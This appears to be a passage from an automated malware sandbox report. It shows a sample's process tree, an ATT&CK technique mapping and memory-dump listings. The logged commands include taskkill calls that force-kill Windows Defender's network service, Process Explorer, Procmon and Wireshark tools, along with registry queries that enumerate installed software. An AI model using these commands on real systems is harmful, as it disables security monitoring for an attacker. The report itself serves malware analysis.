  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4280
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1588
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:5052
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4664
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2756
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:4624
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:4772
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4764
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:800
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:2248
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4320
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:4960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:4296
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4404
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4560
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:4756
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:4036
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4676
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:4648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:1276
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1324
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:1960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:1252
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5104
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:3932
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:4156
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:4788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:4784
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2668
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:4220
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4944
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:4428
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:964
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2760
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:4636
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:4172
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4384
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:4452
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    PID:4876
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4396
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:4420
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    PID:4588
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1764
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:4688
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4820
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:4388
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:4364
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3416
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:4472
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:4144
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4448
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4088
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4824
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2388
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4536
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1772
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3948

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/536-94-0x0000026FC9620000-0x0000026FC9621000-memory.dmp

Filesize
4KB

Download
memory/536-105-0x0000026FE1930000-0x0000026FE1931000-memory.dmp

Filesize
4KB

Download
memory/536-80-0x00007FFFFAC40000-0x00007FFFFB62C000-memory.dmp

Filesize
9.9MB

Download